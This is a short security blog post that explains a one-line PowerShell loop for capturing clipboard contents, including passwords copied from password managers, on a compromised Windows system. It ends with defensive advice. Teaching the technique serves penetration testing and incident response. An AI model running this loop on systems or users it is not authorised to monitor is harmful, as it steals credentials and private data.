Quick article today about one of my favorite tools to use in a penetration test or red-team engagement after exploiting a Windows 10 system: Get-Clipboard.
Get-Clipboard retrieves the contents of the clipboard. It sounds pretty straightforward, but it can also be a big information disclosure threat. An attacker can gets access to the logged-in user session can setup a loop to capture and display the clipboard contents every time it changes. Here the 1-line PowerShell clipboard script I use:
$x=""; while($true) { $y=get-clipboard -raw; if ($x -ne $y) { Write-Host $y; $x=$y } ; Sleep 1 }
Let's break down this 1-line script piece-by-piece:
- $x="";: Declare an empty variable $x; we'll use this to hold the contents of the clipboard
- while($true) {: Start a look that continues until interrupted
- $y=get-clipboard -raw;: Get the contents of the clipboard, storing it in $y; the -Raw argument returns multiline clipboard contents as a single string instead of an array
- if ($x -ne $y) {: If the $y clipboard contents is different than what we saw in $x, then execute the following block of statements.
- Write-Host $y;: Write the new clipboard contents to the host (screen)
- $x=$y: Set $x to be equal to $y so we don't print the changed clipboard contents more than once
- } ;: End the earlier if block
- Sleep 1: Wait 1 second before checking the clipboard again
- }: End the earlier while($true) loop
Running this command on a Windows host will reveal anything copied into the clipboard, but it particularly useful when the victim uses a password manager.
Password managers often make use of the clipboard to share password information between applications. Many clipboard managers will clear a password from the clipboard after a few minutes to prevent it from being disclosed, but an active attacker can interrogate the clipboard for password information very quickly.
Here's an example of this script in use on a macOS system against the 1Password password manager.
Attacks against the clipboard aren't new, and affects a lot of platforms. Where possible, avoid using the clipboard for sensitive data like passwords (use the password manager browser plugin where possible, for example). Otherwise, recognize the clipboard as a weak point in most operating systems, and conduct your incident response investigations accordingly.
-Joshua Wright
Return to Getting Started With PowerShell
Joshua Wright is the author of SANS SEC504: Hacker Tools, Techniques, and Incident Handling, a faculty fellow for the SANS Institute, and a senior technical director at Counter Hack.
